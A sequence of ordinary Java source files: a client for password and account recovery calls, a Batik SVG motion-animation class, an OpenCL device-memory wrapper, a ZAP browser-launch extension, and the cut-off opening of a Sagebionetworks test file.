UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean verifyUser(String username, CaptchaInfoBean captcha) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.verifyUser(username, captcha); } /** * Sends the password recovery notification. * * @param username username of the user * @param key confirmation code * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean sendRecoveryNotification(String username, String key) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.sendRecoveryNotification(username, key, IdentityManagementEndpointConstants.PasswordRecoveryOptions.EMAIL); } /** * Verifies the password recovery notification confirmation. * * @param username username of the user * @param code confirmation code * @param captcha an instance of CaptchaInfoBean * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean verifyConfirmationCode(String username, String code, CaptchaInfoBean captcha) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.verifyConfirmationCode(username, code, captcha); } /** * Resets the password. * * @param username username of the user * @param confirmationCode confirmation code * @param newPassword new password * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean resetPassword(String username, String confirmationCode, String newPassword) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.updatePassword(username, confirmationCode, newPassword); } /** * Returns the question ids of the challenge questions configured by the user. * * @param username username of the user * @param confirmationCode confirmation code * @return an instance of ChallengeQuestionIdsDTO which holds the status and question ids * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public ChallengeQuestionIdsDTO getUserChallengeQuestionIds(String username, String confirmationCode) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.getUserChallengeQuestionIds(username, confirmationCode); } /** * Returns the question corresponded with the provided question id. * * @param username username of the user * @param code confirmation code * @param id question id * @return and instance of UserChallengesDTO which holds the question * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public UserChallengesDTO getChallengeQuestion(String username, String code, String id) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.getUserChallengeQuestion(username, code, id); } /** * Returns the challenge questions configured for the user. * * @param username username of the user * @param confirmationCode confirmation code * @return an instance of UserChallengesCollectionDTO which holds user challenge questions * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public UserChallengesCollectionDTO getChallengeQuestions(String username, String confirmationCode) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.getUserChallengeQuestions(username, confirmationCode); } /** * Verifies the provided answer for the respective question. * * @param username username of the user * @param code confirmation code * @param id question id * @param answer user answer * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean verifyUserChallengeAnswer(String username, String code, String id, String answer) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.verifyUserChallengeAnswer(username, code, id, answer); } /** * Verifies user answers for the user challenge question set. * * @param username username of the user * @param confirmationCode confirmation code * @param userChallengesDTOs an array of UserChallengesDTO instances which holds the respective question and answer * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean verifyUserChallengeAnswers(String username, String confirmationCode, UserChallengesDTO[] userChallengesDTOs) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.verifyUserChallengeAnswers(username, confirmationCode, userChallengesDTOs); } /** * Returns the claims supported. * * @param dialect claim dialect * @return an array of UserIdentityClaimDTO instances * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityExceptionException */ public UserIdentityClaimDTO[] getUserIdentitySupportedClaims(String dialect) throws RemoteException, UserInformationRecoveryServiceIdentityExceptionException { return stub.getUserIdentitySupportedClaims(dialect); } /** * Verifies the captcha answer and recovers the username via the provided claims * * @param claims claims of the user * @param captcha an instance of CaptchaInfoBean * @param tenantDomain tenant domain * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean verifyAccount(UserIdentityClaimDTO[] claims, CaptchaInfoBean captcha, String tenantDomain) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.verifyAccount(claims, captcha, tenantDomain); } /** * Registers the user. * * @param userName username * @param password password * @param claims claims of the user * @param profileName profile name * @param tenantDomain tenant domain * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean registerUser(String userName, String password, UserIdentityClaimDTO[] claims, String profileName, String tenantDomain) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.registerUser(userName, password, claims, profileName, tenantDomain); } /** * Confirms self registration notification. * * @param userName username of the user * @param code confirmation code * @param captcha an instance of CaptchaInfoBean * @param tenantDomain tenant domain * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public VerificationBean confirmUserSelfRegistration (String userName, String code, CaptchaInfoBean captcha, String tenantDomain) throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.confirmUserSelfRegistration(userName, code, captcha, tenantDomain); } }
/* Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package org.apache.batik.anim; import java.awt.geom.Point2D; import org.apache.batik.anim.timing.TimedElement; import org.apache.batik.anim.values.AnimatableAngleValue; import org.apache.batik.anim.values.AnimatableMotionPointValue; import org.apache.batik.anim.values.AnimatableValue; import org.apache.batik.dom.anim.AnimatableElement; import org.apache.batik.ext.awt.geom.Cubic; import org.apache.batik.ext.awt.geom.ExtendedGeneralPath; import org.apache.batik.ext.awt.geom.ExtendedPathIterator; import org.apache.batik.ext.awt.geom.PathLength; import org.apache.batik.util.SMILConstants; /** * An animation class for 'animateMotion' animations. * * @author <a href="mailto:cam%40mcc%2eid%2eau">Cameron McCormack</a> * @version $Id$ */ public class MotionAnimation extends InterpolatingAnimation { /** * The path that describes the motion. */ protected ExtendedGeneralPath path; /** * The path length calculation object. */ protected PathLength pathLength; /** * The points defining the distance along the path that the * keyTimes apply. */ protected float[] keyPoints; /** * Whether automatic rotation should be performed. */ protected boolean rotateAuto; /** * Whether the automatic rotation should be reversed. */ protected boolean rotateAutoReverse; /** * The angle of rotation (in radians) to use when automatic rotation is * not being used. */ protected float rotateAngle; /** * Creates a new MotionAnimation. */ public MotionAnimation(TimedElement timedElement, AnimatableElement animatableElement, int calcMode, float[] keyTimes, float[] keySplines, boolean additive, boolean cumulative, AnimatableValue[] values, AnimatableValue from, AnimatableValue to, AnimatableValue by, ExtendedGeneralPath path, float[] keyPoints, boolean rotateAuto, boolean rotateAutoReverse, float rotateAngle, short rotateAngleUnit) { super(timedElement, animatableElement, calcMode, keyTimes, keySplines, additive, cumulative); this.rotateAuto = rotateAuto; this.rotateAutoReverse = rotateAutoReverse; this.rotateAngle = AnimatableAngleValue.rad(rotateAngle, rotateAngleUnit); if (path == null) { path = new ExtendedGeneralPath(); if (values == null || values.length == 0) { if (from != null) { AnimatableMotionPointValue fromPt = (AnimatableMotionPointValue) from; float x = fromPt.getX(); float y = fromPt.getY(); path.moveTo(x, y); if (to != null) { AnimatableMotionPointValue toPt = (AnimatableMotionPointValue) to; path.lineTo(toPt.getX(), toPt.getY()); } else if (by != null) { AnimatableMotionPointValue byPt = (AnimatableMotionPointValue) by; path.lineTo(x + byPt.getX(), y + byPt.getY()); } else { throw timedElement.createException ("values.to.by.path.missing", new Object[] { null }); } } else { if (to != null) { AnimatableMotionPointValue unPt = (AnimatableMotionPointValue) animatableElement.getUnderlyingValue(); AnimatableMotionPointValue toPt = (AnimatableMotionPointValue) to; path.moveTo(unPt.getX(), unPt.getY()); path.lineTo(toPt.getX(), toPt.getY()); this.cumulative = false; } else if (by != null) { AnimatableMotionPointValue byPt = (AnimatableMotionPointValue) by; path.moveTo(0, 0); path.lineTo(byPt.getX(), byPt.getY()); this.additive = true; } else { throw timedElement.createException ("values.to.by.path.missing", new Object[] { null }); } } } else { AnimatableMotionPointValue pt = (AnimatableMotionPointValue) values[0]; path.moveTo(pt.getX(), pt.getY()); for (int i = 1; i < values.length; i++) { pt = (AnimatableMotionPointValue) values[i]; path.lineTo(pt.getX(), pt.getY()); } } } this.path = path; pathLength = new PathLength(path); int segments = 0; ExtendedPathIterator epi = path.getExtendedPathIterator(); while (!epi.isDone()) { int type = epi.currentSegment(); if (type != ExtendedPathIterator.SEG_MOVETO) { segments++; } epi.next(); } int count = keyPoints == null ? segments + 1 : keyPoints.length; float totalLength = pathLength.lengthOfPath(); if (this.keyTimes != null && calcMode != CALC_MODE_PACED) { if (this.keyTimes.length != count) { throw timedElement.createException ("attribute.malformed", new Object[] { null, SMILConstants.SMIL_KEY_TIMES_ATTRIBUTE }); } } else { if (calcMode == CALC_MODE_LINEAR || calcMode == CALC_MODE_SPLINE) { this.keyTimes = new float[count]; for (int i = 0; i < count; i++) { this.keyTimes[i] = (float) i / (count - 1); } } else if (calcMode == CALC_MODE_DISCRETE) { this.keyTimes = new float[count]; for (int i = 0; i < count; i++) { this.keyTimes[i] = (float) i / count; } } else { // CALC_MODE_PACED // This corrects the keyTimes to be paced, so from now on // it can be considered the same as CALC_MODE_LINEAR. epi = path.getExtendedPathIterator(); this.keyTimes = new float[count]; int j = 0; for (int i = 0; i < count - 1; i++) { while (epi.currentSegment() == ExtendedPathIterator.SEG_MOVETO) { j++; epi.next(); } this.keyTimes[i] = pathLength.getLengthAtSegment(j) / totalLength; j++; epi.next(); } this.keyTimes[count - 1] = 1f; } } if (keyPoints != null) { if (keyPoints.length != this.keyTimes.length) { throw timedElement.createException ("attribute.malformed", new Object[] { null, SMILConstants.SMIL_KEY_POINTS_ATTRIBUTE }); } } else { epi = path.getExtendedPathIterator(); keyPoints = new float[count]; int j = 0; for (int i = 0; i < count - 1; i++) { while (epi.currentSegment() == ExtendedPathIterator.SEG_MOVETO) { j++; epi.next(); } keyPoints[i] = pathLength.getLengthAtSegment(j) / totalLength; j++; epi.next(); } keyPoints[count - 1] = 1f; } this.keyPoints = keyPoints; } /** * Called when the element is sampled at the given unit time. This updates * the {@link #value} of the animation if active. */ protected void sampledAtUnitTime(float unitTime, int repeatIteration) { AnimatableValue value, accumulation; float interpolation = 0; if (unitTime != 1) { int keyTimeIndex = 0; while (keyTimeIndex < keyTimes.length - 1 && unitTime >= keyTimes[keyTimeIndex + 1]) { keyTimeIndex++; } if (keyTimeIndex == keyTimes.length - 1 && calcMode == CALC_MODE_DISCRETE) { keyTimeIndex = keyTimes.length - 2; interpolation = 1; } else { if (calcMode == CALC_MODE_LINEAR || calcMode == CALC_MODE_PACED || calcMode == CALC_MODE_SPLINE) { if (unitTime == 0) { interpolation = 0; } else { interpolation = (unitTime - keyTimes[keyTimeIndex]) / (keyTimes[keyTimeIndex + 1] - keyTimes[keyTimeIndex]); } if (calcMode == CALC_MODE_SPLINE && unitTime != 0) { // XXX This could be done better, e.g. with // Newton-Raphson. Cubic c = keySplineCubics[keyTimeIndex]; float tolerance = 0.001f; float min = 0; float max = 1; Point2D.Double p; for (;;) { float t = (min + max) / 2; p = c.eval(t); double x = p.getX(); if (Math.abs(x - interpolation) < tolerance) { break; } if (x < interpolation) { min = t; } else { max = t; } } interpolation = (float) p.getY(); } } } float point = keyPoints[keyTimeIndex]; if (interpolation != 0) { point += interpolation * (keyPoints[keyTimeIndex + 1] - keyPoints[keyTimeIndex]); } point *= pathLength.lengthOfPath(); Point2D p = pathLength.pointAtLength(point); float ang; if (rotateAuto) { ang = pathLength.angleAtLength(point); if (rotateAutoReverse) { ang += Math.PI; } } else { ang = rotateAngle; } value = new AnimatableMotionPointValue(null, (float) p.getX(), (float) p.getY(), ang); } else { Point2D p = pathLength.pointAtLength(pathLength.lengthOfPath()); float ang; if (rotateAuto) { ang = pathLength.angleAtLength(pathLength.lengthOfPath()); if (rotateAutoReverse) { ang += Math.PI; } } else { ang = rotateAngle; } value = new AnimatableMotionPointValue(null, (float) p.getX(), (float) p.getY(), ang); } if (cumulative) { Point2D p = pathLength.pointAtLength(pathLength.lengthOfPath()); float ang; if (rotateAuto) { ang = pathLength.angleAtLength(pathLength.lengthOfPath()); if (rotateAutoReverse) { ang += Math.PI; } } else { ang = rotateAngle; } accumulation = new AnimatableMotionPointValue(null, (float) p.getX(), (float) p.getY(), ang); } else { accumulation = null; } this.value = value.interpolate(this.value, null, interpolation, accumulation, repeatIteration); if (this.value.hasChanged()) { markDirty(); } } }
/* * Copyright 2008-2016 Barcelona Supercomputing Center (www.bsc.es) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package es.bsc.opencl.wrapper; import java.lang.reflect.Array; import java.util.HashMap; import java.util.concurrent.LinkedBlockingQueue; import org.jocl.CL; import org.jocl.Pointer; import org.jocl.Sizeof; import org.jocl.cl_command_queue; import org.jocl.cl_context; import org.jocl.cl_event; import org.jocl.cl_mem; public abstract class DeviceMemory { private final cl_context context; private final cl_command_queue queue; private long memoryFree; private final HashMap<String, MemoryRegister> inMemoryValues = new HashMap<>(); private final LinkedBlockingQueue<MemoryRequest> requestQueue = new LinkedBlockingQueue<>(); public DeviceMemory(long memoryFree, cl_context context, cl_command_queue queue) { this.memoryFree = memoryFree; this.context = context; this.queue = queue; } public void setOnMemory(Device.OpenCLMemoryPrepare listener, String dataId, Object object, Class<?> objectClass, int size, boolean isRead, boolean canWrite) { MemoryRegister register = inMemoryValues.get(dataId); if (register == null) { int byteSize = baseSize(objectClass) * size; if (memoryFree < byteSize) { if (!releaseMemory(byteSize)) { MemoryRequest mr = new MemoryRequest(listener, dataId, object, objectClass, size, isRead, canWrite); requestQueue.add(mr); //Operation will be performed when there's space enough return; } } register = createRegister(dataId, byteSize, canWrite); if (isRead) { register.writeValue(objectClass, size, object); } inMemoryValues.put(dataId, register); memoryFree -= register.getSize(); } pendingAccess(register); listener.completed(register); } public void replaceCreatorEvent(Object parValue, cl_event overridingEvent) { MemoryRegister register = (MemoryRegister) parValue; register.replaceLoadingEvent(overridingEvent); } public void retrieveValue(Object parValue, Object target, boolean wasWritten) { MemoryRegister register = (MemoryRegister) parValue; if (wasWritten) { int size = 1; Class<?> targetClass = target.getClass(); Object sizeObject = target; while (targetClass.isArray()) { size *= Array.getLength(sizeObject); sizeObject = Array.get(sizeObject, 0); targetClass = targetClass.getComponentType(); } register.retrieveValue(target, targetClass, size); } performedAccess(register); } protected abstract MemoryRegister createRegister(String dataId, int size, boolean canWrite); protected abstract void pendingAccess(MemoryRegister reg); protected abstract void performedAccess(MemoryRegister reg); private boolean releaseMemory(long space) { MemoryRegister register; while (space - memoryFree > 0) { register = this.releaseRegister(space - memoryFree); if (register == null) { return false; } inMemoryValues.remove(register.getDataId()); memoryFree += register.getSize(); register.destroy(); } return true; } protected abstract MemoryRegister releaseRegister(long missingSpace); private static class MemoryRequest { private final Device.OpenCLMemoryPrepare listener; private final String valueRenaming; private final Object object; private final Class<?> objectClass; private final int size; private final boolean copyInput; private final boolean canWrite; public MemoryRequest(Device.OpenCLMemoryPrepare listener, String valueRenaming, Object object, Class<?> objectClass, int size, boolean copyInput, boolean canWrite) { this.listener = listener; this.valueRenaming = valueRenaming; this.object = object; this.objectClass = objectClass; this.size = size; this.copyInput = copyInput; this.canWrite = canWrite; } public Device.OpenCLMemoryPrepare getListener() { return listener; } public Object getObject() { return object; } public Class<?> getObjectClass() { return objectClass; } public int getSize() { return size; } public String getValueRenaming() { return valueRenaming; } public boolean isCanWrite() { return canWrite; } public boolean isCopyInput() { return copyInput; } } public abstract class MemoryRegister { private final cl_mem data; private final long size; private cl_event firstLoadingEvent; private cl_event loadingEvent; private final String dataId; public MemoryRegister(String dataId, int size, boolean canWrite) { this.size = size; int[] errCode = new int[1]; this.data = CL.clCreateBuffer(context, canWrite ? CL.CL_MEM_READ_WRITE : CL.CL_MEM_READ_ONLY, size, null, errCode); this.dataId = dataId; } public final String getDataId() { return dataId; } public final long getSize() { return size; } public final cl_mem getBuffer() { return data; } public final void writeValue(Class<?> objectClass, int size, Object object) { int[] errout = new int[1]; Object seq; if (object.getClass().getComponentType().isArray()) { seq = Array.newInstance(objectClass, size); flatten(object, seq, 0); } else { seq = object; } cl_event event = new cl_event(); if (objectClass == boolean.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_char * size, Pointer.to((char[]) seq), 0, null, event); } if (objectClass == byte.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_char * size, Pointer.to((byte[]) seq), 0, null, event); } if (objectClass == char.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_short * size, Pointer.to((char[]) seq), 0, null, event); } if (objectClass == short.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_short * size, Pointer.to((short[]) seq), 0, null, event); } if (objectClass == int.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_int * size, Pointer.to((int[]) seq), 0, null, event); } if (objectClass == long.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_long * size, Pointer.to((long[]) seq), 0, null, event); } if (objectClass == float.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_float * size, Pointer.to((float[]) seq), 0, null, event); } if (objectClass == double.class) { CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_double * size, Pointer.to((double[]) seq), 0, null, event); } setLoadingEvent(event); CL.clFlush(queue); } public final void replaceLoadingEvent(cl_event overridingEvent) { this.firstLoadingEvent = this.loadingEvent; this.loadingEvent = overridingEvent; } public final void retrieveValue(Object target, Class<?> targetClass, int size) { CL.clFlush(queue); Object flatResult; if (target.getClass().getComponentType().isArray()) { flatResult = Array.newInstance(targetClass, size); } else { flatResult = target; } if (targetClass == boolean.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_char, Pointer.to((char[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == byte.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_char, Pointer.to((byte[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == char.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_short, Pointer.to((char[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == short.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_short, Pointer.to((short[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == int.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_int, Pointer.to((int[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == long.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_long, Pointer.to((long[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == float.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_float, Pointer.to((float[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } if (targetClass == double.class) { CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_double, Pointer.to((double[]) flatResult), 1, new cl_event[]{loadingEvent}, null); } CL.clFlush(queue); if (target.getClass().getComponentType().isArray()) { expand(flatResult, target, 0); } } public final cl_event getLoadingEvent() { return loadingEvent; } public final void setLoadingEvent(cl_event event) { this.loadingEvent = event; } public final void destroy() { if (firstLoadingEvent != null) { CL.clReleaseEvent(firstLoadingEvent); } CL.clReleaseEvent(loadingEvent); CL.clReleaseMemObject(data); } @Override public String toString() { return "Data " + dataId + " (" + data + ") created by " + loadingEvent + " fills " + size + " bytes "; } } private static int baseSize(Class aClass) { if (aClass == boolean.class) { return Sizeof.cl_char; } if (aClass == byte.class) { return Sizeof.cl_char; } if (aClass == char.class) { return Sizeof.cl_char; } if (aClass == short.class) { return Sizeof.cl_short; } if (aClass == int.class) { return Sizeof.cl_int; } if (aClass == long.class) { return Sizeof.cl_long; } if (aClass == float.class) { return Sizeof.cl_float; } if (aClass == double.class) { return Sizeof.cl_double; } return Sizeof.POINTER; } private static int expand(Object seq, Object o, int offset) { int read; Class<?> oClass = o.getClass(); if (oClass.isArray()) { if (oClass.getComponentType().isArray()) { read = 0; for (int componentId = 0; componentId < Array.getLength(o); componentId++) { read += expand(seq, Array.get(o, componentId), offset + read); } } else { System.arraycopy(seq, offset, o, 0, Array.getLength(o)); read = Array.getLength(o); } } else { Array.set(o, offset, seq); read = 1; } return read; } private static int flatten(Object o, Object seq, int offset) { int written; Class<?> oClass = o.getClass(); if (oClass.isArray()) { if (oClass.getComponentType().isArray()) { written = 0; for (int componentId = 0; componentId < Array.getLength(o); componentId++) { written += flatten(Array.get(o, componentId), seq, offset + written); } } else { System.arraycopy(o, 0, seq, offset, Array.getLength(o)); written = Array.getLength(o); } } else { Array.set(seq, offset, o); written = 1; } return written; } }
/* * Zed Attack Proxy (ZAP) and its related class files. * * ZAP is an HTTP/HTTPS proxy for assessing web application security. * * Copyright 2017 The ZAP Development Team * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.zaproxy.zap.extension.quickstart.launch; import java.util.ArrayList; import java.util.Collections; import java.util.List; import javax.swing.ImageIcon; import javax.swing.JButton; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.openqa.selenium.WebDriver; import org.parosproxy.paros.Constant; import org.parosproxy.paros.control.Control; import org.parosproxy.paros.extension.Extension; import org.parosproxy.paros.extension.ExtensionAdaptor; import org.parosproxy.paros.extension.ExtensionHook; import org.parosproxy.paros.extension.OptionsChangedListener; import org.parosproxy.paros.model.OptionsParam; import org.parosproxy.paros.view.View; import org.zaproxy.zap.control.AddOn; import org.zaproxy.zap.extension.AddOnInstallationStatusListener; import org.zaproxy.zap.extension.api.API; import org.zaproxy.zap.extension.quickstart.ExtensionQuickStart; import org.zaproxy.zap.extension.quickstart.QuickStartParam; import org.zaproxy.zap.extension.selenium.ExtensionSelenium; import org.zaproxy.zap.utils.DisplayUtils; public class ExtensionQuickStartLaunch extends ExtensionAdaptor implements AddOnInstallationStatusListener, OptionsChangedListener { private static final String DEFAULT_VALUE_URL_FIELD = "http://"; public static final String NAME = "ExtensionQuickStartLaunch"; private static final Logger LOGGER = LogManager.getLogger(ExtensionQuickStartLaunch.class); public static final String RESOURCES = "/org/zaproxy/zap/extension/quickstart/resources"; private static final ImageIcon CHROME_ICON = DisplayUtils.getScaledIcon( new ImageIcon( ExtensionQuickStart.class.getResource(RESOURCES + "/chrome.png"))); private static final ImageIcon CHROMIUM_ICON = DisplayUtils.getScaledIcon( new ImageIcon( ExtensionQuickStart.class.getResource(RESOURCES + "/chromium.png"))); private static final ImageIcon FIREFOX_ICON = DisplayUtils.getScaledIcon( new ImageIcon( ExtensionQuickStart.class.getResource(RESOURCES + "/firefox.png"))); private static final ImageIcon SAFARI_ICON = DisplayUtils.getScaledIcon( new ImageIcon( ExtensionQuickStart.class.getResource(RESOURCES + "/safari.png"))); private OptionsQuickStartLaunchPanel optionsPanel; private LaunchPanel launchPanel; private JButton launchToolbarButton; private static final List<Class<? extends Extension>> DEPENDENCIES; static { List<Class<? extends Extension>> dependencies = new ArrayList<>(2); dependencies.add(ExtensionQuickStart.class); dependencies.add(ExtensionSelenium.class); DEPENDENCIES = Collections.unmodifiableList(dependencies); } public ExtensionQuickStartLaunch() { super(NAME); } @Override public boolean supportsDb(String type) { return true; } @Override public void hook(ExtensionHook extensionHook) { super.hook(extensionHook); extensionHook.addApiImplementor(new QuickStartLaunchAPI(this)); extensionHook.addAddOnInstallationStatusListener(this); extensionHook.addOptionsChangedListener(this); if (getView() != null) { extensionHook.getHookView().addMainToolBarComponent(getLaunchToolbarButton()); extensionHook.getHookView().addOptionPanel(getOptionsPanel()); this.launchPanel = new LaunchPanel( this, this.getExtQuickStart(), this.getExtQuickStart().getQuickStartPanel()); this.getExtQuickStart().setLaunchPanel(this.launchPanel); } } @Override public boolean canUnload() { return true; } @Override public void unload() { if (getView() != null) { this.getExtQuickStart().setLaunchPanel(null); } } @Override public void postInit() { if (this.launchPanel != null) { this.launchPanel.postInit(); } } @Override public void optionsLoaded() { super.optionsLoaded(); if (View.isInitialised()) { setToolbarButtonIcon( this.getExtQuickStart().getQuickStartParam().getLaunchDefaultBrowser()); if (this.launchPanel != null) { this.launchPanel.optionsChanged(); } } } @Override public void optionsChanged(OptionsParam optionsParam) { if (this.launchPanel != null) { this.launchPanel.optionsChanged(); } } private OptionsQuickStartLaunchPanel getOptionsPanel() { if (optionsPanel == null) { optionsPanel = new OptionsQuickStartLaunchPanel(); } return optionsPanel; } private JButton getLaunchToolbarButton() { if (launchToolbarButton == null) { launchToolbarButton = new JButton(); launchToolbarButton.setToolTipText( Constant.messages.getString("quickstart.toolbar.button.tooltip.launch")); launchToolbarButton.addActionListener( e -> launchBrowser( launchPanel.getSelectedBrowser(), launchPanel.getUrlValue())); } return launchToolbarButton; } protected void setToolbarButtonIcon(String browser) { if ("firefox".equalsIgnoreCase(browser)) { launchToolbarButton.setIcon(FIREFOX_ICON); } else if ("chrome".equalsIgnoreCase(browser)) { launchToolbarButton.setIcon(CHROME_ICON); } else if ("safari".equalsIgnoreCase(browser)) { launchToolbarButton.setIcon(SAFARI_ICON); } else { launchToolbarButton.setIcon(CHROMIUM_ICON); } } @Override public List<Class<? extends Extension>> getDependencies() { return DEPENDENCIES; } @Override public String getDescription() { return Constant.messages.getString("quickstart.launch.desc"); } private ExtensionQuickStart getExtQuickStart() { return Control.getSingleton().getExtensionLoader().getExtension(ExtensionQuickStart.class); } public ExtensionSelenium getExtSelenium() { return Control.getSingleton().getExtensionLoader().getExtension(ExtensionSelenium.class); } protected void launchBrowser(String browserName, String url) { new Thread( () -> { try { WebDriver wd = getExtSelenium().getProxiedBrowserByName(browserName); if (wd != null) { QuickStartParam params = getExtQuickStart().getQuickStartParam(); if (url != null && url.length() > 0 && !url.equals(DEFAULT_VALUE_URL_FIELD)) { wd.get(url); } else if (params.isLaunchZapStartPage()) { wd.get( API.getInstance() .getBaseURL( API.Format.OTHER, QuickStartLaunchAPI.API_PREFIX, API.RequestType.other, QuickStartLaunchAPI .OTHER_START_PAGE, true)); } else if (!params.isLaunchBlankStartPage()) { wd.get(params.getLaunchStartPage()); } // Use the same browser next time, as long // as it worked params.setLaunchDefaultBrowser(browserName); params.getConfig().save(); } } catch (Exception e1) { ExtensionSelenium extSel = getExtSelenium(); View.getSingleton() .showWarningDialog( extSel.getWarnMessageFailedToStart( browserName, e1)); LOGGER.error(e1.getMessage(), e1); } }, "ZAP-BrowserLauncher") .start(); } public String getDefaultLaunchContent() { // This is no longer read from a link return Constant.messages.getString("quickstart.launch.html"); } @Override public void addOnInstalled(AddOn addOn) { // Not currently supported } @Override public void addOnSoftUninstalled(AddOn addOn, boolean successfully) {} @Override public void addOnUninstalled(AddOn addOn, boolean successfully) { if (getView() != null && addOn.getId().equals("hud")) { this.launchPanel.hudAddOnUninstalled(); } } }
package org.sagebionetworks.repo.manager; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertTrue; import java.util.ArrayList; import java.util.Collections; import java.util.LinkedList; import java.util.List; import org.junit.After; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.sagebionetworks.repo.model.ACCESS_TYPE; import org.sagebionetworks.repo.model.AccessControlList; import org.sagebionetworks.repo.model.AuthorizationConstants; import org.sagebionetworks.repo.model.DatastoreException; import org.sagebionetworks.repo.model.NextPageToken; import org.sagebionetworks.repo.model.Project; import org.sagebionetworks.repo.model.ProjectHeader; import org.sagebionetworks.repo.model.ProjectHeaderList; import org.sagebionetworks.repo.model.ProjectListSortColumn; import org.sagebionetworks.repo.model.ProjectListType; import org.sagebionetworks.repo.model.ResourceAccess; import org.sagebionetworks.repo.model.UnauthorizedException; import org.sagebionetworks.repo.model.UserInfo; import org.sagebionetworks.repo.model.UserProfile; import org.sagebionetworks.repo.model.UserProfileDAO; import org.sagebionetworks.repo.model.auth.NewUser; import 